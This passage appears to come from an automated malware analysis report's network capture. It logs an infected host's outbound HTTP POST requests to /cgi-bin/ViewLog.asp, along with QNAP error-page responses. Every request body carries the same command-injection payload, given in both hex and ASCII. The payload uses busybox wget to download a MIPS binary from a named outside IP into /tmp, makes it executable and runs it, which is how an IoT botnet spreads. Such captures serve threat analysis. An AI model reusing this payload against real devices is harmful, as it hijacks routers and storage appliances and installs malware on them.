                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.308182955 CET1340INHTTP/1.0 404 Not Found
                                              Server: http server 1.0
                                              Content-type: text/html
                                              Date: Thu, 23 Nov 2023 04:17:33 GMT
                                              Last-modified: Thu, 23 Nov 2023 04:17:33 GMT
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-bottom:


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              443192.168.2.145282894.122.222.1808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.129504919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              444192.168.2.145521631.33.140.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.497807980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.043662071 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:36.130610943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              445192.168.2.144130431.136.220.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.502456903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.074657917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:36.194612026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:38.562522888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.170362949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.129961014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.305196047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              446192.168.2.143766894.134.40.1038080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:34.520167112 CET1340INHTTP/1.0 400 Bad Request
                                              Server: http server 1.0
                                              Content-type: text/html
                                              Date: Thu, 23 Nov 2023 04:17:33 GMT
                                              Last-modified: Thu, 23 Nov 2023 04:17:33 GMT
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-botto


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              447192.168.2.144769095.86.87.888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:35.840977907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              448192.168.2.145904431.200.57.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.646955967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              449192.168.2.143607094.122.86.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.656466007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              450192.168.2.144732031.153.5.498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.656506062 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
